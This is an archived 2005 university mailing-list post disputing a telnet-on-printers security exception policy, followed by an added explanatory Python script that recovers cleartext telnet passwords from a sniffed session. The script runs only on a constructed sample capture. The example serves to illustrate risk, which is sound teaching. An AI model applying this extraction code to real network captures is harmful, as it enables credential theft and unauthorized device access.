On Fri, May 06, 2005 at 04:36:21PM -0700, Craig Lant wrote:
>
> Just to clarify, the CISC will grant exceptions for open telnet ports on
> printers only if there is no way to turn off the telnet port, a
> reasonable password is set, and the telnet port is rarely, if ever,
> used. However, we still need people to submit requests for exception so
> that SNS has the IP addresses involved and so that we can track these
> exceptions. They are not indefinite exceptions, they are, at most, for
> one year.

I think that this stance is unreasonable, for two reasons. First, the
sudden change to aggressive blocking has taken people by surprise.
(For almost two years we were told that SNS didn't intend to block
devices unless they actually generated a problem. Now it seems that
anything that violates the policy will be blocked.) The three criteria
for granting an exception appear to be pretty arbitrary. This puts
those of us who generally support enforcement of minimum standards
in a difficult position.

Second, there are some printers for which telnet is the only
reasonable management interface. More recent HP models have SSL
enabled web interfaces, but older ones don't support any standard
access method except telnet. (Please don't suggest that we install
MS Windows to run proprietary software for managing printers.)

All of the printers that I know of running telnet allow access to be
restricted to a small set of machines, and that seems sufficient to
mitigate the technical violation of the security standards.

Now, it's possible that there is a way to manage HP printers from a
Mac, or another unix box, but I've asked many people, and nobody
has suggested a way. If anyone knows how, I'd be delighted to adopt it
and turn off telnet altogether.

We have known for a while that telnet on printers technically violates
the standards, but since we restrict access to our local subnets,
and don't have any good management alternative, we figured that they
would be OK as is, until they eventually break and get replaced by
modern devices - this might take more than one year. If necessary, we
could probably restrict telnet access to a very small number of
machines, but turning it off altogether presents a problem. I fully
understand that a cracker could break into one of the hosts on our
subnet, set up a sniffer and wait till someone telnets to a printer,
and then use that password to compromise the printer; having done
so, they could do bad things. Realistically, this seems very low
in probability compared to attacks directed at Windows vulnerabilities,
and other easy targets.

Oh, by the way, it's kind of humorous that you are asking people to
submit exception requests for violations that SNS scanning can't
detect. Good luck in getting the community to cooperate on that!

Steve
--
Steve Sizemore <steve (at) ls.berkeley.edu>, (510) 642-8570
Unix System Manager
Dept. of Mathematics and College of Letters and Science
University of California, Berkeley
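The sniffing scenario Steve describes above (an attacker on the same subnet waits for an admin to telnet to a printer and reads the password off the wire) is worth seeing concretely. The following is an added example, not code from the original message or from any HP or Berkeley tool: it takes a telnet session captured as a list of direction-tagged byte segments, strips the IAC option negotiation, and pulls out whatever the client typed after each "Password:" prompt, honoring backspace edits. The capture itself is constructed for the example; the banner text, prompt and password are invented, and the simplifying assumption is that no escaped 0xFF bytes occur inside subnegotiation blocks.

```python
"""Recover a cleartext telnet password from a sniffed session (added example)."""

# Telnet protocol bytes (RFC 854).
IAC, SE, SB, WILL, WONT, DO, DONT = 255, 240, 250, 251, 252, 253, 254


def strip_negotiation(data: bytes) -> bytes:
    """Drop IAC option negotiation so only application data remains.

    Handles IAC IAC (escaped literal 0xFF) and skips SB ... IAC SE blocks.
    Assumption: no escaped 0xFF inside a subnegotiation block.
    """
    out = bytearray()
    i, n = 0, len(data)
    while i < n:
        b = data[i]
        if b != IAC:
            out.append(b)
            i += 1
            continue
        if i + 1 >= n:          # dangling IAC at the end of a segment
            break
        cmd = data[i + 1]
        if cmd == IAC:          # escaped literal 0xFF
            out.append(IAC)
            i += 2
        elif cmd in (WILL, WONT, DO, DONT):
            i += 3              # IAC <cmd> <option>
        elif cmd == SB:
            end = data.find(bytes([IAC, SE]), i + 2)
            i = n if end < 0 else end + 2
        else:
            i += 2              # NOP, GA and other two-byte commands
    return bytes(out)


def recover_passwords(segments):
    """segments: (direction, bytes) pairs in capture order, direction 'S'
    for printer->admin and 'C' for admin->printer.  Returns every line the
    client typed after a 'Password:' prompt.  Works in character-at-a-time
    mode (one byte per segment) as well as line mode."""
    found = []
    awaiting = False
    typed = bytearray()
    for direction, raw in segments:
        data = strip_negotiation(raw)
        if direction == "S":
            if data.rstrip().lower().endswith(b"password:"):
                awaiting, typed = True, bytearray()
            continue
        if not awaiting:
            continue
        for b in data:
            if b in (0x08, 0x7F):          # BS / DEL: user corrected a typo
                if typed:
                    typed.pop()
            elif b in (0x0D, 0x0A):        # end of line: password complete
                found.append(typed.decode("ascii", "replace"))
                awaiting = False
                break
            else:
                typed.append(b)
    return found


# Constructed capture: server offers ECHO and SUPPRESS-GO-AHEAD, client
# accepts, then the admin types "hunt3", backspaces, types "2", and Enter.
CAPTURE = [
    ("S", bytes([IAC, WILL, 1, IAC, WILL, 3])
          + b"\r\nPrinter management (telnet)\r\n\r\nPassword: "),
    ("C", bytes([IAC, DO, 1, IAC, DO, 3])),
    ("C", b"h"), ("C", b"u"), ("C", b"n"), ("C", b"t"), ("C", b"3"),
    ("C", b"\x7f"), ("C", b"2"),
    ("C", b"\r\n"),
    ("S", b"\r\n> "),
    ("C", b"ipconfig\r\n"),
]

if __name__ == "__main__":
    for pw in recover_passwords(CAPTURE):
        print("password seen on the wire:", pw)
```

The point of the example is how little the attacker has to do: no protocol decoding beyond skipping three-byte negotiation sequences, and the credential is simply the bytes between the prompt and the first carriage return. A source-address restriction on the printer does nothing against this, because the sniffer only needs to be on the same broadcast domain as an allowed admin host, not in the allowed list itself; that is the residual risk Steve weighs against the practical cost of turning telnet off.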
------------------------------------------------------------------------
The following was automatically added to this message by the list server:
For information about Micronet, including subscribing to
or unsubscribing from its mailing list and finding out
about upcoming meetings, please visit the Micronet Web site:
<http://micronet.berkeley.edu/>.
This archive was generated by hypermail 2.1.8 : Fri May 06 2005 - 20:59:49 PDT